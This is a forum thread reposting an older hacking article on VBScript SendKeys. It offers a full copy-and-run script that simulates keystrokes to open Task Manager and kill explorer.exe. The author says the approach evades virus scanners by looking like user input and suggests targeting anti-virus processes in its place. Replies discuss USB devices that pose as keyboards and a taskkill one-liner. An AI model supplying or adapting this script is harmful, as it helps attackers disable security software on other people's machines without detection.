Author Topic: Kill Processes with VBScript  (Read 702 times)

0 Members and 1 Guest are viewing this topic.

Offline peskybear

  • Adherent
  • *
  • Posts: 72
    • View Profile
Kill Processes with VBScript
« on: June 04, 2014, 07:38:13 am »
Originally by burroughs circa 2012 via the totse2 archives:

Background

VBScript is Microsoft's scripting language. It can be embedded in web pages or used to automate tasks. In our case, we'll be looking at task automation.

VBScript has a method called SendKeys, which simulates user actions by sending keystrokes to the active window. From what I've read, you need to activate an application in order to start sending it keystrokes, which is done like this:

Code: [Select]
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "%windir%\notepad.exe"
WshShell.AppActivate "Notepad"

Keys can be sent like this:

Code: [Select]
WshShell.SendKeys "ZOMG HACKIN' UR COMPZ"
WScript.sleep 100
WshShell.SendKeys "4 REALZ!"
WScript.sleep 100

Notice the 100 millisecond pauses inbetween sending keystrokes? That's important because SenKeys is simulating a user actions. So, for example, if you're opening programs, you need to wait for them to load.

The problem seems to be that it doesn't matter what keystrokes you send. So really, you can send an application globally recognized keystroke combinations and it will behave just as if entered by a user. For example, you can activate NotePad, send it some keys, and then send it ALT + F4, which is the Windows shortcut for closing a program. After the activated program is closed, your keys will be sent to whatever happens to be the next active window or area.

The Danger

I've also experimented with other key shortcuts, like opening the start menu on Windows, typing in the name of a program to find, and then pressing enter. Using this method I've been able to open up both command prompt and task manager, and from there, you can use your imagination. I would guess this to be more dangerous than a malicious program or batch file because it appears as if the commands are being issued by the user, and not by a script or program. This would probably make it more difficult for virus scanners to detect.

In other words, the script isn't saying "OPEN COMMAND PROMPT", but simulating the keystrokes that a user would enter to get the same end result.

A Sample Script

The following script behaves largely as I described before. It kills explorer.exe, which basically is responsible for displaying your desktop, the start menu, and many other important things. This will not do any real damage other than taking a few seconds to relaunch explorer.exe, but run at your own risk. Copy and paste into NotePad, save as something.vbs, and run it.

Code: [Select]
Set WshShell = WScript.CreateObject("WScript.Shell")

' Open and activate notepad.
WshShell.Run "%windir%\notepad.exe"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.sleep 100

' Message to send to user.
WshShell.SendKeys "UR ABOUT 2 GET HAX'D"
WScript.sleep 100
WshShell.SendKeys "!"
WScript.sleep 100
WshShell.SendKeys "!"
WScript.sleep 100
WshShell.SendKeys "!"
WScript.sleep 100
WshShell.SendKeys "!"
WScript.sleep 100
WshShell.SendKeys "1"
WScript.sleep 100
WshShell.SendKeys "1"
WScript.sleep 100
WshShell.SendKeys "one"
WScript.sleep 100

' Alt + F4 to close Notepad.
WshShell.SendKeys "%{F4}"
WScript.sleep 100

' Move arrow key over to "Don't Save" when prompted and press enter.
WshShell.SendKeys "{RIGHT}"
WScript.sleep 100
WshShell.SendKeys "{ENTER}"
WScript.sleep 100

' CTRL + ESCAPE to open start menu.
WshShell.SendKeys "^{ESCAPE}"
WScript.sleep 100

' Search for task manager and press enter to execute and launch window.
WshShell.SendKeys "task manager"
WScript.sleep 2000
WshShell.SendKeys "{ENTER}"
WScript.sleep 2000

' Search for "explorer", which will bring us to explorer.exe.
WshShell.SendKeys "explorer"
WScript.sleep 100

' Equivalent of right click.
WshShell.SendKeys "+{F10}"
WScript.sleep 100

' Down twice to get to "End Process", press enter to end and enter again to confirm.
WshShell.SendKeys "{DOWN}"
WScript.sleep 100
WshShell.SendKeys "{DOWN}"
WScript.sleep 100
WshShell.SendKeys "{ENTER}"
WScript.sleep 100
WshShell.SendKeys "{ENTER}"
WScript.sleep 100

Of course, we don't have to kill Windows Explorer. We could substitute it with the names of known anti-virus processes and other 'pesky' software...

This method can be very tricky sometimes and can result in erratic behavior since Windows' layouts vary from OS to OS. For example, the way I wrote my script assumes that when you open task manager, the Process tab will be selected, which very well may not be the case depending on what was selected when task manager was last closed. If the Process tab isn't selected, this won't do anything other than make your computer beep for sending a bunch of keystrokes that won't do anything.

http://ss64.com/vb/sendkeys.html
« Last Edit: July 12, 2014, 01:08:22 am by peskybear »

Offline burroughs

  • Adherent
  • *
  • Posts: 62
    • View Profile
Re: Kill Processes with VBScript
« Reply #1 on: June 06, 2014, 10:10:22 pm »
Oh looky looky. Nice find :).

This method has actually gained a lot of popularity, albeit implemented slightly different. Basically someone has a thumb drive which is recognized as a "keyboard" by the computer and it starts sending keystrokes that result in bad things. This is pretty awesome since it works even if you have autorun disabled.

Offline aldra

  • Arch Disciple
  • ***
  • Posts: 623
  • albrecht drais
    • View Profile
Re: Kill Processes with VBScript
« Reply #2 on: September 07, 2014, 04:30:01 pm »
Oh looky looky. Nice find :).

This method has actually gained a lot of popularity, albeit implemented slightly different. Basically someone has a thumb drive which is recognized as a "keyboard" by the computer and it starts sending keystrokes that result in bad things. This is pretty awesome since it works even if you have autorun disabled.


I can't imagine that working via vbs - to be detected as a keyboard/HID device you'd have to hack the firmware of the USB stick and change it's identity, and likely enter all your keystroke data in there as it won't be able to read from it's standard data anymore

also, an easier way to kill processes in windows is using taskkill /f /im <process name>; it can be done via command prompt or batch script.